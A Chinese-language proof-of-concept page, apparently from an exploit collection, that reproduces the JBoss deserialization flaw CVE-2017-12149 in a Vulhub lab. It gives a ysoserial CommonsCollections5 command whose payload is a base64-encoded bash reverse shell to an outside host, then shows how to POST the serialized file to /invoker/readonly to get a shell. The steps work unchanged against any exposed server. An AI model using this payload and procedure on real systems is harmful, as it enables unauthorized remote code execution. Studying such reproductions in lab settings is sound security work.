Awesome-POC/中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md
2024-11-06 14:10:36 +08:00

1.8 KiB
Raw Blame History

JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149

漏洞描述

该漏洞为 Java反序列化错误类型存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

参考:

环境搭建

Vulhub运行测试环境

docker-compose up -d

首次执行时会有1~3分钟时间初始化初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。

漏洞复现

该漏洞出现在/invoker/readonly请求中服务器将用户提交的POST内容进行了Java反序列化

image-20230328155952101

所以我们用常规Java反序列化漏洞测试方法来复现该漏洞。

编写反弹shell的命令

我们使用bash来反弹shell但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法我们需要用进行一次编码。

image-20230328160010674

序列化数据生成

使用ysoserial来复现生成序列化数据由于Vulhub使用的Java版本较新所以选择使用的gadget是CommonsCollections5

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser将这个文件作为POST Body发送至/invoker/readonly即可

image-20230328160034054

成功反弹shell

image-20230328160045518